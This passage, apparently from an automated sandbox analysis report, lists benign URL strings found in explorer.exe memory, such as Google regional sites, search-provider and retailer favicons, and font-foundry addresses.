Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001E.00000002.704498511.00000000045BE000.00000004.00000001.sdmp | String found in binary or memory: http://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000